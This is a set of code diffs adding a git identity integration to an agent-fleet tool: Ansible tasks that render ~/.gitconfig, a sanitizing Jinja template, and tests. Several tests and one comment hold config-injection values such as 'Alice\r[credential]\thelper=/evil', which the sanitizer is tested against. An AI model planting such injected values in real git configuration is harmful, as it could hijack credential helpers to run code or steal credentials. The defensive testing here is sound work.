+    shared_template_path = Path(__file__).parent.parent / "platform" / "templates"
+
     # Get playbook path
     playbook_path = _get_lifecycle_playbook_path(resolved_type, "configure")
     if not playbook_path.exists():
@@ -1782,6 +1786,7 @@ def configure_agent(
         "agent_type": resolved_type,
         "config": config_data,
         "template_path": str(template_path),
+        "shared_template_path": str(shared_template_path),
         "provider_api_key": provider_api_key,
         "aws_access_key": aws_access_key,
         "aws_secret_key": aws_secret_key,

--- a/src/clawrium/platform/registry/hermes/playbooks/configure.yaml
+++ b/src/clawrium/platform/registry/hermes/playbooks/configure.yaml
@@ -144,6 +144,7 @@
         mode: "0600"
       become: yes
       become_user: "{{ agent_name }}"
+      no_log: true
       when: integrations is defined
       loop: "{{ integrations | dict2items | selectattr('value.type', 'equalto', 'git') | list }}"
       loop_control:

--- a/src/clawrium/platform/registry/hermes/playbooks/configure.yaml
+++ b/src/clawrium/platform/registry/hermes/playbooks/configure.yaml
@@ -141,7 +141,7 @@
         dest: "/home/{{ agent_name }}/.gitconfig"
         owner: "{{ agent_name }}"
         group: "{{ agent_name }}"
-        mode: "0644"
+        mode: "0600"
       become: yes
       become_user: "{{ agent_name }}"
       when: integrations is defined

--- a/src/clawrium/platform/registry/hermes/playbooks/configure.yaml
+++ b/src/clawrium/platform/registry/hermes/playbooks/configure.yaml
@@ -130,6 +130,32 @@
       no_log: true
       notify: Restart hermes service
 
+    # Render ~/.gitconfig for each `git` integration (#531). Position
+    # mirrors zeroclaw: before the GitHub auth block so a future
+    # `gh auth setup-git` in hermes would not be wiped by the template.
+    # selectattr filter returns an empty list when no `git` integration
+    # is assigned, making this a no-op on existing fleets.
+    - name: Render ~/.gitconfig for each git integration
+      ansible.builtin.template:
+        src: "{{ shared_template_path }}/gitconfig.j2"
+        dest: "/home/{{ agent_name }}/.gitconfig"
+        owner: "{{ agent_name }}"
+        group: "{{ agent_name }}"
+        mode: "0644"
+      become: yes
+      become_user: "{{ agent_name }}"
+      when: integrations is defined
+      loop: "{{ integrations | dict2items | selectattr('value.type', 'equalto', 'git') | list }}"
+      loop_control:
+        label: "{{ item.key }}"
+      vars:
+        git:
+          user_name:            "{{ item.value.GIT_USER_NAME | default('') }}"
+          user_email:           "{{ item.value.GIT_USER_EMAIL | default('') }}"
+          init_default_branch:  "{{ item.value.GIT_INIT_DEFAULT_BRANCH | default('main') }}"
+          pull_rebase:          "{{ item.value.GIT_PULL_REBASE | default('false') }}"
+          core_editor:          "{{ item.value.GIT_CORE_EDITOR | default('vim') }}"
+
     # GitHub CLI authentication — runs `gh auth login --with-token` as the
     # agent user for each assigned github integration. `gh` is a soft
     # dependency: if it isn't installed, the env var path (GITHUB_TOKEN in

--- a/src/clawrium/platform/registry/openclaw/playbooks/configure.yaml
+++ b/src/clawrium/platform/registry/openclaw/playbooks/configure.yaml
@@ -97,6 +97,7 @@
         mode: "0600"
       become: yes
       become_user: "{{ agent_name }}"
+      no_log: true
       when: integrations is defined
       loop: "{{ integrations | dict2items | selectattr('value.type', 'equalto', 'git') | list }}"
       loop_control:

--- a/src/clawrium/platform/registry/openclaw/playbooks/configure.yaml
+++ b/src/clawrium/platform/registry/openclaw/playbooks/configure.yaml
@@ -94,7 +94,7 @@
         dest: "/home/{{ agent_name }}/.gitconfig"
         owner: "{{ agent_name }}"
         group: "{{ agent_name }}"
-        mode: "0644"
+        mode: "0600"
       become: yes
       become_user: "{{ agent_name }}"
       when: integrations is defined

--- a/src/clawrium/platform/registry/openclaw/playbooks/configure.yaml
+++ b/src/clawrium/platform/registry/openclaw/playbooks/configure.yaml
@@ -84,6 +84,31 @@
       no_log: true
       notify: Restart openclaw service
 
+    # Render ~/.gitconfig for each `git` integration (#531). Position
+    # mirrors zeroclaw: before the GitHub auth block. selectattr filter
+    # returns an empty list when no `git` integration is assigned, making
+    # this a no-op on existing fleets.
+    - name: Render ~/.gitconfig for each git integration
+      ansible.builtin.template:
+        src: "{{ shared_template_path }}/gitconfig.j2"
+        dest: "/home/{{ agent_name }}/.gitconfig"
+        owner: "{{ agent_name }}"
+        group: "{{ agent_name }}"
+        mode: "0644"
+      become: yes
+      become_user: "{{ agent_name }}"
+      when: integrations is defined
+      loop: "{{ integrations | dict2items | selectattr('value.type', 'equalto', 'git') | list }}"
+      loop_control:
+        label: "{{ item.key }}"
+      vars:
+        git:
+          user_name:            "{{ item.value.GIT_USER_NAME | default('') }}"
+          user_email:           "{{ item.value.GIT_USER_EMAIL | default('') }}"
+          init_default_branch:  "{{ item.value.GIT_INIT_DEFAULT_BRANCH | default('main') }}"
+          pull_rebase:          "{{ item.value.GIT_PULL_REBASE | default('false') }}"
+          core_editor:          "{{ item.value.GIT_CORE_EDITOR | default('vim') }}"
+
     # GitHub CLI authentication block
     # Authenticates gh CLI for each github integration if gh is installed
     # This enables openclaw's bundled github skill automatically

--- a/src/clawrium/platform/registry/zeroclaw/playbooks/configure.yaml
+++ b/src/clawrium/platform/registry/zeroclaw/playbooks/configure.yaml
@@ -132,6 +132,34 @@
       no_log: true
       notify: Restart zeroclaw service
 
+    # Render ~/.gitconfig for each `git` integration (#531). Positioned
+    # BEFORE `gh auth setup-git` so the credential.helper key that setup-git
+    # writes survives — setup-git appends to the existing gitconfig, but
+    # ansible.builtin.template overwrites the whole file. Reverse order
+    # would silently drop the credential.helper line.
+    # selectattr filter returns an empty list when no `git` integration is
+    # assigned, making this a no-op on existing fleets.
+    - name: Render ~/.gitconfig for each git integration
+      ansible.builtin.template:
+        src: "{{ shared_template_path }}/gitconfig.j2"
+        dest: "/home/{{ agent_name }}/.gitconfig"
+        owner: "{{ agent_name }}"
+        group: "{{ agent_name }}"
+        mode: "0644"
+      become: yes
+      become_user: "{{ agent_name }}"
+      when: integrations is defined
+      loop: "{{ integrations | dict2items | selectattr('value.type', 'equalto', 'git') | list }}"
+      loop_control:
+        label: "{{ item.key }}"
+      vars:
+        git:
+          user_name:            "{{ item.value.GIT_USER_NAME | default('') }}"
+          user_email:           "{{ item.value.GIT_USER_EMAIL | default('') }}"
+          init_default_branch:  "{{ item.value.GIT_INIT_DEFAULT_BRANCH | default('main') }}"
+          pull_rebase:          "{{ item.value.GIT_PULL_REBASE | default('false') }}"
+          core_editor:          "{{ item.value.GIT_CORE_EDITOR | default('vim') }}"
+
     # GitHub CLI authentication block (#422, mirrors hermes configure.yaml).
     # `gh` is a soft dependency: when absent, the Environment= drop-in above
     # still wires GITHUB_TOKEN so skills calling the GitHub REST API

--- a/src/clawrium/platform/registry/zeroclaw/playbooks/configure.yaml
+++ b/src/clawrium/platform/registry/zeroclaw/playbooks/configure.yaml
@@ -148,6 +148,7 @@
         mode: "0600"
       become: yes
       become_user: "{{ agent_name }}"
+      no_log: true
       when: integrations is defined
       loop: "{{ integrations | dict2items | selectattr('value.type', 'equalto', 'git') | list }}"
       loop_control:

--- a/src/clawrium/platform/registry/zeroclaw/playbooks/configure.yaml
+++ b/src/clawrium/platform/registry/zeroclaw/playbooks/configure.yaml
@@ -145,7 +145,7 @@
         dest: "/home/{{ agent_name }}/.gitconfig"
         owner: "{{ agent_name }}"
         group: "{{ agent_name }}"
-        mode: "0644"
+        mode: "0600"
       become: yes
       become_user: "{{ agent_name }}"
       when: integrations is defined

--- a/src/clawrium/platform/templates/gitconfig.j2
+++ b/src/clawrium/platform/templates/gitconfig.j2
@@ -1,12 +1,15 @@
+{# Defense-in-depth: strip CR/LF from every interpolated value so a stored
+   value that bypassed the CLI's _sanitize_git_field cannot inject a new
+   gitconfig section (e.g. [credential] helper=/evil). #}
 [user]
-    name = {{ git.user_name }}
-    email = {{ git.user_email }}
+    name = {{ (git.user_name | default('', true) | string) | replace('\n', ' ') | replace('\r', '') }}
+    email = {{ (git.user_email | default('', true) | string) | replace('\n', ' ') | replace('\r', '') }}
 
 [init]
-    defaultBranch = {{ git.init_default_branch | default('main', true) }}
+    defaultBranch = {{ (git.init_default_branch | default('main', true) | string) | replace('\n', ' ') | replace('\r', '') }}
 
 [pull]
-    rebase = {{ git.pull_rebase | default('false', true) }}
+    rebase = {{ (git.pull_rebase | default('false', true) | string) | replace('\n', ' ') | replace('\r', '') }}
 
 [core]
-    editor = {{ git.core_editor | default('vim', true) }}
+    editor = {{ (git.core_editor | default('vim', true) | string) | replace('\n', ' ') | replace('\r', '') }}

--- a/src/clawrium/platform/templates/gitconfig.j2
+++ b/src/clawrium/platform/templates/gitconfig.j2
@@ -2,14 +2,14 @@
    value that bypassed the CLI's _sanitize_git_field cannot inject a new
    gitconfig section (e.g. [credential] helper=/evil). #}
 [user]
-    name = {{ (git.user_name | default('', true) | string) | replace('\n', ' ') | replace('\r', '') }}
-    email = {{ (git.user_email | default('', true) | string) | replace('\n', ' ') | replace('\r', '') }}
+    name = {{ (git.user_name | default('', true) | string) | replace('\n', ' ') | replace('\r', '') | replace('\x00', '') }}
+    email = {{ (git.user_email | default('', true) | string) | replace('\n', ' ') | replace('\r', '') | replace('\x00', '') }}
 
 [init]
-    defaultBranch = {{ (git.init_default_branch | default('main', true) | string) | replace('\n', ' ') | replace('\r', '') }}
+    defaultBranch = {{ (git.init_default_branch | default('main', true) | string) | replace('\n', ' ') | replace('\r', '') | replace('\x00', '') }}
 
 [pull]
-    rebase = {{ (git.pull_rebase | default('false', true) | string) | replace('\n', ' ') | replace('\r', '') }}
+    rebase = {{ (git.pull_rebase | default('false', true) | string) | replace('\n', ' ') | replace('\r', '') | replace('\x00', '') }}
 
 [core]
-    editor = {{ (git.core_editor | default('vim', true) | string) | replace('\n', ' ') | replace('\r', '') }}
+    editor = {{ (git.core_editor | default('vim', true) | string) | replace('\n', ' ') | replace('\r', '') | replace('\x00', '') }}

--- a/src/clawrium/platform/templates/gitconfig.j2
+++ b/src/clawrium/platform/templates/gitconfig.j2
@@ -1,0 +1,12 @@
+[user]
+    name = {{ git.user_name }}
+    email = {{ git.user_email }}
+
+[init]
+    defaultBranch = {{ git.init_default_branch | default('main', true) }}
+
+[pull]
+    rebase = {{ git.pull_rebase | default('false', true) }}
+
+[core]
+    editor = {{ git.core_editor | default('vim', true) }}

--- a/tests/test_cli_agent_integration_singleton.py
+++ b/tests/test_cli_agent_integration_singleton.py
@@ -64,6 +64,10 @@ def test_second_git_attach_is_rejected(isolated_config):
     assert second.exit_code == 1, second.output
     assert "already has a git integration" in second.output.lower()
     assert "git-personal" in second.output
+    # The remediation hint must reference the actual command path the
+    # operator should run; a regression that drops the hint line must fail
+    # this assertion (W5).
+    assert "agent integration remove" in second.output
 
 
 def test_git_attach_does_not_block_non_git_types(isolated_config):
@@ -80,6 +84,37 @@ def test_git_attach_does_not_block_non_git_types(isolated_config):
 
     second = runner.invoke(app, ["agent", "integration", "add", "work", "gh"])
     assert second.exit_code == 0, second.output
+
+
+def test_singleton_enforced_at_core_layer_not_just_cli(isolated_config):
+    """Direct call to `add_agent_integration` (no CLI guard in path) must
+    still reject a second git attach. Iter-2 NB-1: enforcement moved into
+    the update_host closure inside core/integrations.py.
+    """
+    _seed(
+        isolated_config,
+        [
+            {"name": "g1", "type": "git"},
+            {"name": "g2", "type": "git"},
+        ],
+    )
+
+    from clawrium.core.integrations import (
+        add_agent_integration,
+        IntegrationSingletonViolation,
+    )
+
+    assert add_agent_integration("192.168.1.100", "opc-work", "g1") is True
+
+    try:
+        add_agent_integration("192.168.1.100", "opc-work", "g2")
+    except IntegrationSingletonViolation as e:
+        assert e.existing_name == "g1"
+    else:
+        raise AssertionError(
+            "core add_agent_integration must raise IntegrationSingletonViolation "
+            "on a second git-type attach (iter-2 NB-1)."
+        )
 
 
 def test_re_attaching_same_git_integration_is_idempotent(isolated_config):

--- a/tests/test_cli_agent_integration_singleton.py
+++ b/tests/test_cli_agent_integration_singleton.py
@@ -1,0 +1,93 @@
+"""Singleton guard: only one `git` integration may be attached per agent.
+
+Phase 2's playbook loop writes ~/.gitconfig once per assigned git integration
+with `ansible.builtin.template` (force: yes by default). A second attach
+would silently overwrite the first. The CLI rejects the second attach
+before it can be persisted. Tests drive the CLI runner against a hosts.json
+that wires the agent dict the way `add_agent_integration` expects (keyed
+by the agent name returned from `get_installed_claw`).
+"""
+
+import json
+
+from typer.testing import CliRunner
+from clawrium.cli.main import app
+from clawrium.core.integrations import INTEGRATIONS_FILE
+
+
+runner = CliRunner()
+
+
+def _seed(config_dir, integrations):
+    config_dir.mkdir(parents=True, exist_ok=True)
+    (config_dir / INTEGRATIONS_FILE).write_text(json.dumps(integrations))
+    # hosts.json with the agent dict keyed by agent name so
+    # add_agent_integration's `agents[claw_name]` lookup succeeds.
+    hosts_data = [
+        {
+            "hostname": "192.168.1.100",
+            "alias": "server1",
+            "port": 22,
+            "agent_name": "xclm",
+            "agents": {
+                "opc-work": {
+                    "type": "openclaw",
+                    "version": "0.1.0",
+                    "status": "installed",
+                    "name": "work",
+                    "agent_name": "opc-work",
+                    "integrations": [],
+                }
+            },
+        }
+    ]
+    (config_dir / "hosts.json").write_text(json.dumps(hosts_data))
+
+
+def test_second_git_attach_is_rejected(isolated_config):
+    _seed(
+        isolated_config,
+        [
+            {"name": "git-personal", "type": "git"},
+            {"name": "git-work", "type": "git"},
+        ],
+    )
+
+    first = runner.invoke(
+        app, ["agent", "integration", "add", "work", "git-personal"]
+    )
+    assert first.exit_code == 0, first.output
+
+    second = runner.invoke(
+        app, ["agent", "integration", "add", "work", "git-work"]
+    )
+    assert second.exit_code == 1, second.output
+    assert "already has a git integration" in second.output.lower()
+    assert "git-personal" in second.output
+
+
+def test_git_attach_does_not_block_non_git_types(isolated_config):
+    _seed(
+        isolated_config,
+        [
+            {"name": "g", "type": "git"},
+            {"name": "gh", "type": "github"},
+        ],
+    )
+
+    first = runner.invoke(app, ["agent", "integration", "add", "work", "g"])
+    assert first.exit_code == 0, first.output
+
+    second = runner.invoke(app, ["agent", "integration", "add", "work", "gh"])
+    assert second.exit_code == 0, second.output
+
+
+def test_re_attaching_same_git_integration_is_idempotent(isolated_config):
+    _seed(isolated_config, [{"name": "g", "type": "git"}])
+
+    runner.invoke(app, ["agent", "integration", "add", "work", "g"])
+    again = runner.invoke(app, ["agent", "integration", "add", "work", "g"])
+
+    assert again.exit_code == 0, again.output
+    # Idempotent path emits "already assigned", not the singleton-block error.
+    assert "already has a git integration" not in again.output.lower()

--- a/tests/test_cli_integration.py
+++ b/tests/test_cli_integration.py
@@ -319,6 +319,12 @@ class TestIntegrationCredentialsUpdateGitSanitization:
         stored = get_integration_credentials("g")["GIT_USER_NAME"]
         assert "\r" not in stored
         assert "\n" not in stored
+        # Positive content assertion: a regression that skipped
+        # set_integration_credential entirely would otherwise leave the
+        # original 'Alice' in place and still satisfy the negative checks.
+        assert stored.startswith("Mallory")
+        # CLI must surface the sanitization (iter-3 B2).
+        assert "sanitized" in result.output.lower()
 
     def test_update_lf_newline_in_user_name(self, isolated_config):
         """A literal \\n payload via mocked prompt is flattened (W4)."""
@@ -350,6 +356,32 @@ class TestIntegrationCredentialsUpdateGitSanitization:
         assert result.exit_code == 0, result.output
         stored = get_integration_credentials("g")["GIT_USER_NAME"]
         assert "\n" not in stored
+        assert stored.startswith("Mallory")
+
+
+class TestIntegrationAddGitRequiredFieldNUL:
+    """A NUL-only payload for a required field must fail loudly (iter-3 B1)."""
+
+    def test_nul_only_required_field_exits_1(self, isolated_config):
+        isolated_config.mkdir(parents=True, exist_ok=True)
+
+        def fake_run(cmd, *args, **kwargs):
+            class R:
+                returncode = 0
+                stdout = ""
+            return R()
+
+        with patch("clawrium.cli.integration.subprocess.run", side_effect=fake_run), \
+             patch(
+                 "clawrium.cli.integration.typer.prompt",
+                 side_effect=["\x00\x00"],  # required field exhausts to ''
+             ):
+            result = runner.invoke(
+                app, ["integration", "add", "g", "--type", "git"]
+            )
+
+        assert result.exit_code == 1, result.output
+        assert "required" in result.output.lower()
 
 
 def test_sanitize_git_field_strips_null_byte():

--- a/tests/test_cli_integration.py
+++ b/tests/test_cli_integration.py
@@ -284,6 +284,95 @@ class TestIntegrationAddGitSanitization:
         assert stored.startswith("Alice")
 
 
+class TestIntegrationCredentialsUpdateGitSanitization:
+    """The `credentials --update` path must also sanitize git fields (T1)."""
+
+    def test_update_strips_carriage_returns(self, isolated_config):
+        isolated_config.mkdir(parents=True, exist_ok=True)
+        # Seed an existing git integration with clean values.
+        (isolated_config / INTEGRATIONS_FILE).write_text(
+            json.dumps([{"name": "g", "type": "git"}])
+        )
+        from clawrium.core.integrations import (
+            set_integration_credential,
+            get_integration_credentials,
+        )
+
+        set_integration_credential("g", "GIT_USER_NAME", "Alice")
+        set_integration_credential("g", "GIT_USER_EMAIL", "alice@example.com")
+
+        with patch(
+            "clawrium.cli.integration.typer.prompt",
+            side_effect=[
+                "Mallory\r[credential]\thelper=/evil",  # GIT_USER_NAME override
+                "",  # GIT_USER_EMAIL — keep existing
+                "",  # GIT_INIT_DEFAULT_BRANCH
+                "",  # GIT_PULL_REBASE
+                "",  # GIT_CORE_EDITOR
+            ],
+        ):
+            result = runner.invoke(
+                app, ["integration", "credentials", "g", "--update"]
+            )
+
+        assert result.exit_code == 0, result.output
+        stored = get_integration_credentials("g")["GIT_USER_NAME"]
+        assert "\r" not in stored
+        assert "\n" not in stored
+
+    def test_update_lf_newline_in_user_name(self, isolated_config):
+        """A literal \\n payload via mocked prompt is flattened (W4)."""
+        isolated_config.mkdir(parents=True, exist_ok=True)
+        (isolated_config / INTEGRATIONS_FILE).write_text(
+            json.dumps([{"name": "g", "type": "git"}])
+        )
+        from clawrium.core.integrations import (
+            set_integration_credential,
+            get_integration_credentials,
+        )
+
+        set_integration_credential("g", "GIT_USER_NAME", "Alice")
+        set_integration_credential("g", "GIT_USER_EMAIL", "alice@example.com")
+
+        with patch(
+            "clawrium.cli.integration.typer.prompt",
+            side_effect=[
+                "Mallory\n[credential]\nhelper=/evil",
+                "",
+                "",
+                "",
+                "",
+            ],
+        ):
+            result = runner.invoke(
+                app, ["integration", "credentials", "g", "--update"]
+            )
+        assert result.exit_code == 0, result.output
+        stored = get_integration_credentials("g")["GIT_USER_NAME"]
+        assert "\n" not in stored
+
+
+def test_sanitize_git_field_strips_null_byte():
+    """Direct unit test for the NUL clause (T3)."""
+    from clawrium.cli.integration import _sanitize_git_field
+
+    assert _sanitize_git_field("Alice\x00[core]") == "Alice[core]"
+    assert _sanitize_git_field("\x00\x00\x00") == ""
+    # \r → "" (dropped), \n → " " (flattened), \x00 → "" (dropped)
+    assert _sanitize_git_field("Alice\rBob\nCarol\x00Dave") == "AliceBob CarolDave"
+
+
+def test_sanitize_git_field_strips_all_three():
+    """Comprehensive: CR removed, LF → space, NUL removed."""
+    from clawrium.cli.integration import _sanitize_git_field
+
+    out = _sanitize_git_field("a\rb\nc\x00d")
+    assert "\r" not in out
+    assert "\n" not in out
+    assert "\x00" not in out
+    assert "a" in out and "d" in out
+
+
 class TestIntegrationShow:
     """Tests for 'clm integration show' command."""
 

--- a/tests/test_cli_integration.py
+++ b/tests/test_cli_integration.py
@@ -133,6 +133,115 @@ class TestIntegrationAdd:
         assert "already exists" in result.output.lower()
 
 
+class TestIntegrationAddGit:
+    """Tests for `clm integration add --type git` (#531)."""
+
+    def _run_git_add(self, name: str, input_text: str):
+        return runner.invoke(
+            app, ["integration", "add", name, "--type", "git"], input=input_text
+        )
+
+    def test_git_add_prefills_identity_from_local_git_config(self, isolated_config):
+        """Identity defaults shell out to `git config --global` and accept on Enter."""
+        isolated_config.mkdir(parents=True, exist_ok=True)
+
+        def fake_run(cmd, *args, **kwargs):
+            assert cmd[:3] == ["git", "config", "--global"]
+            stdout_map = {"user.name": "Alice Local\n", "user.email": "alice@local\n"}
+            class R:
+                returncode = 0
+                stdout = stdout_map.get(cmd[3], "")
+            return R()
+
+        with patch("clawrium.cli.integration.subprocess.run", side_effect=fake_run):
+            # Press Enter for all five prompts → accept defaults.
+            result = self._run_git_add("my-git", "\n\n\n\n\n")
+
+        assert result.exit_code == 0, result.output
+        from clawrium.core.integrations import get_integration_credentials
+        creds = get_integration_credentials("my-git")
+        assert creds["GIT_USER_NAME"] == "Alice Local"
+        assert creds["GIT_USER_EMAIL"] == "alice@local"
+        assert creds["GIT_INIT_DEFAULT_BRANCH"] == "main"
+        assert creds["GIT_PULL_REBASE"] == "false"
+        assert creds["GIT_CORE_EDITOR"] == "vim"
+
+    def test_git_add_handles_missing_local_git_config(self, isolated_config):
+        """Missing/erroring `git config` falls back to empty identity prompts.
+
+        The user types identity values; static defaults still apply when Enter
+        is pressed for optional fields.
+        """
+        isolated_config.mkdir(parents=True, exist_ok=True)
+
+        class FailR:
+            returncode = 1
+            stdout = ""
+
+        with patch(
+            "clawrium.cli.integration.subprocess.run",
+            side_effect=FileNotFoundError("git not installed"),
+        ):
+            # Provide identity then accept defaults for the three optionals.
+            result = self._run_git_add(
+                "my-git", "Bob\nbob@example.com\n\n\n\n"
+            )
+
+        assert result.exit_code == 0, result.output
+        from clawrium.core.integrations import get_integration_credentials
+        creds = get_integration_credentials("my-git")
+        assert creds["GIT_USER_NAME"] == "Bob"
+        assert creds["GIT_USER_EMAIL"] == "bob@example.com"
+        assert creds["GIT_INIT_DEFAULT_BRANCH"] == "main"
+        assert creds["GIT_PULL_REBASE"] == "false"
+        assert creds["GIT_CORE_EDITOR"] == "vim"
+        # Suppress unused-class warnings from linters.
+        _ = FailR
+
+    def test_git_add_operator_override_persists(self, isolated_config):
+        """Operator-supplied non-default values are stored verbatim."""
+        isolated_config.mkdir(parents=True, exist_ok=True)
+
+        def fake_run(cmd, *args, **kwargs):
+            class R:
+                returncode = 0
+                stdout = ""
+            return R()
+
+        with patch("clawrium.cli.integration.subprocess.run", side_effect=fake_run):
+            result = self._run_git_add(
+                "my-git", "Carol\ncarol@example.com\ntrunk\ntrue\nnano\n"
+            )
+
+        assert result.exit_code == 0, result.output
+        from clawrium.core.integrations import get_integration_credentials
+        creds = get_integration_credentials("my-git")
+        assert creds["GIT_USER_NAME"] == "Carol"
+        assert creds["GIT_USER_EMAIL"] == "carol@example.com"
+        assert creds["GIT_INIT_DEFAULT_BRANCH"] == "trunk"
+        assert creds["GIT_PULL_REBASE"] == "true"
+        assert creds["GIT_CORE_EDITOR"] == "nano"
+
+    def test_git_add_static_defaults_shown_in_prompt(self, isolated_config):
+        """Static defaults (`main`, `false`, `vim`) are surfaced in the prompt text."""
+        isolated_config.mkdir(parents=True, exist_ok=True)
+
+        def fake_run(cmd, *args, **kwargs):
+            class R:
+                returncode = 0
+                stdout = "Dora\n" if cmd[3] == "user.name" else "dora@example.com\n"
+            return R()
+
+        with patch("clawrium.cli.integration.subprocess.run", side_effect=fake_run):
+            result = self._run_git_add("my-git", "\n\n\n\n\n")
+
+        assert result.exit_code == 0, result.output
+        # typer renders defaults as `[default]` in the prompt.
+        assert "main" in result.output
+        assert "false" in result.output
+        assert "vim" in result.output
+
+
 class TestIntegrationShow:
     """Tests for 'clm integration show' command."""
 

--- a/tests/test_cli_integration.py
+++ b/tests/test_cli_integration.py
@@ -24,6 +24,7 @@ class TestIntegrationTypes:
         assert "atlassian" in result.output
         assert "linear" in result.output
         assert "notion" in result.output
+        assert "git" in result.output
 
 
 class TestIntegrationList:
@@ -240,6 +241,47 @@ class TestIntegrationAddGit:
         assert "main" in result.output
         assert "false" in result.output
         assert "vim" in result.output
+
+
+class TestIntegrationAddGitSanitization:
+    """Newlines in git fields must never reach storage (#534 ATX iter-1 B1)."""
+
+    def test_newline_in_user_name_is_flattened_at_storage(self, isolated_config):
+        isolated_config.mkdir(parents=True, exist_ok=True)
+
+        def fake_run(cmd, *args, **kwargs):
+            class R:
+                returncode = 0
+                stdout = ""
+            return R()
+
+        # typer.prompt reads a line via input(); the test runner supplies
+        # one credential per newline. We cannot inject a literal \n into a
+        # prompt response, but the sanitizer also strips \r — and bash-style
+        # paste exploits commonly use \r. Mock the prompt return directly.
+        with patch("clawrium.cli.integration.subprocess.run", side_effect=fake_run), \
+             patch(
+                 "clawrium.cli.integration.typer.prompt",
+                 side_effect=[
+                     "Alice\r[credential]\thelper=/evil",
+                     "alice@example.com",
+                     "main",
+                     "false",
+                     "vim",
+                 ],
+             ):
+            result = runner.invoke(
+                app, ["integration", "add", "g1", "--type", "git"], input=""
+            )
+
+        assert result.exit_code == 0, result.output
+        from clawrium.core.integrations import get_integration_credentials
+        stored = get_integration_credentials("g1")["GIT_USER_NAME"]
+        assert "\r" not in stored
+        assert "\n" not in stored
+        # The injection token is no longer a section header in the rendered
+        # template (because the literal newline is gone) — kept literal here.
+        assert stored.startswith("Alice")
 
 
 class TestIntegrationShow:

--- a/tests/test_core_integrations.py
+++ b/tests/test_core_integrations.py
@@ -115,7 +115,7 @@ class TestIntegrationTypes:
 
     def test_integration_types_has_expected_types(self):
         """INTEGRATION_TYPES contains expected integration types."""
-        expected_types = {"github", "gitlab", "atlassian", "linear", "notion"}
+        expected_types = {"github", "gitlab", "atlassian", "linear", "notion", "git"}
         assert set(INTEGRATION_TYPES.keys()) == expected_types
 
     def test_each_type_has_description_and_credentials(self):
@@ -130,6 +130,38 @@ class TestIntegrationTypes:
         github = INTEGRATION_TYPES["github"]
         keys = [c["key"] for c in github["credentials"]]
         assert "GITHUB_TOKEN" in keys
+
+    def test_git_integration_exposes_five_fields_with_required_flags(self):
+        """git integration declares the five fields specified in #531."""
+        git = INTEGRATION_TYPES["git"]
+        keys = [c["key"] for c in git["credentials"]]
+        assert keys == [
+            "GIT_USER_NAME",
+            "GIT_USER_EMAIL",
+            "GIT_INIT_DEFAULT_BRANCH",
+            "GIT_PULL_REBASE",
+            "GIT_CORE_EDITOR",
+        ]
+
+    def test_git_integration_required_fields_are_only_user_name_and_email(self):
+        """Only identity fields are required; the other three default at render time."""
+        git = INTEGRATION_TYPES["git"]
+        required_keys = {
+            c["key"] for c in git["credentials"] if c.get("required", False)
+        }
+        assert required_keys == {"GIT_USER_NAME", "GIT_USER_EMAIL"}
+
+    def test_other_integration_types_do_not_expose_git_fields(self):
+        """The five GIT_* keys live only on the git integration."""
+        git_keys = {"GIT_USER_NAME", "GIT_USER_EMAIL", "GIT_INIT_DEFAULT_BRANCH",
+                    "GIT_PULL_REBASE", "GIT_CORE_EDITOR"}
+        for type_name, config in INTEGRATION_TYPES.items():
+            if type_name == "git":
+                continue
+            other_keys = {c["key"] for c in config["credentials"]}
+            assert not (other_keys & git_keys), (
+                f"{type_name} unexpectedly carries git fields: {other_keys & git_keys}"
+            )
 
     def test_atlassian_has_required_credentials(self):
         """Atlassian integration requires URL, email, and token."""

--- a/tests/test_gitconfig_render_task.py
+++ b/tests/test_gitconfig_render_task.py
@@ -70,6 +70,16 @@ def test_gitconfig_render_task_file_attrs(configure_tasks):
     assert block["mode"] == "0600", f"{claw}: mode mismatch (should be 0600 since `gh auth setup-git` later appends credential.helper)"
 
 
+def test_gitconfig_render_task_no_log(configure_tasks):
+    """PII (GIT_USER_NAME, GIT_USER_EMAIL) must not leak into ansible-runner logs."""
+    claw, tasks = configure_tasks
+    task = _find_gitconfig_task(tasks)
+    assert task.get("no_log") is True, (
+        f"{claw}: gitconfig render task must set `no_log: true` so the "
+        f"per-instance run log directory does not retain identity PII."
+    )
+
+
 def test_gitconfig_render_task_runs_as_agent_user(configure_tasks):
     claw, tasks = configure_tasks
     task = _find_gitconfig_task(tasks)

--- a/tests/test_gitconfig_render_task.py
+++ b/tests/test_gitconfig_render_task.py
@@ -67,7 +67,7 @@ def test_gitconfig_render_task_file_attrs(configure_tasks):
     block = task["ansible.builtin.template"]
     assert block["owner"] == "{{ agent_name }}", f"{claw}: owner mismatch"
     assert block["group"] == "{{ agent_name }}", f"{claw}: group mismatch"
-    assert block["mode"] == "0644", f"{claw}: mode mismatch"
+    assert block["mode"] == "0600", f"{claw}: mode mismatch (should be 0600 since `gh auth setup-git` later appends credential.helper)"
 
 
 def test_gitconfig_render_task_runs_as_agent_user(configure_tasks):

--- a/tests/test_gitconfig_render_task.py
+++ b/tests/test_gitconfig_render_task.py
@@ -1,0 +1,162 @@
+"""Structural tests for the per-claw gitconfig render task (#531).
+
+Each claw's configure.yaml must:
+- declare a `Render ~/.gitconfig for each git integration` task,
+- gate it on `type == 'git'` via selectattr,
+- run as the agent user (become_user: {{ agent_name }}),
+- write to /home/<agent>/.gitconfig with mode 0644,
+- pull the template from `{{ shared_template_path }}/gitconfig.j2`,
+- precede the GitHub auth block so that `gh auth setup-git`'s
+  credential.helper write (zeroclaw) is not wiped by the template
+  overwrite, and so the position is consistent across claws.
+"""
+
+from importlib.resources import files
+
+import pytest
+import yaml
+
+
+GITHUB_AUTH_NAMES = {
+    "GitHub CLI authentication block",
+}
+
+
+@pytest.fixture(params=["zeroclaw", "hermes", "openclaw"])
+def configure_tasks(request):
+    pkg = files(f"clawrium.platform.registry.{request.param}")
+    data = yaml.safe_load((pkg / "playbooks" / "configure.yaml").read_text())
+    assert isinstance(data, list) and data, "configure.yaml must be a play list"
+    tasks = data[0]["tasks"]
+    return request.param, tasks
+
+
+def _find_gitconfig_task(tasks):
+    for task in tasks:
+        if not isinstance(task, dict):
+            continue
+        block = task.get("ansible.builtin.template")
+        if not isinstance(block, dict):
+            continue
+        dest = block.get("dest", "")
+        if dest == "/home/{{ agent_name }}/.gitconfig":
+            return task
+    return None
+
+
+def test_gitconfig_render_task_present(configure_tasks):
+    claw, tasks = configure_tasks
+    task = _find_gitconfig_task(tasks)
+    assert task is not None, (
+        f"{claw}/configure.yaml is missing the gitconfig render task"
+    )
+
+
+def test_gitconfig_render_task_uses_shared_template(configure_tasks):
+    claw, tasks = configure_tasks
+    task = _find_gitconfig_task(tasks)
+    block = task["ansible.builtin.template"]
+    assert block["src"] == "{{ shared_template_path }}/gitconfig.j2", (
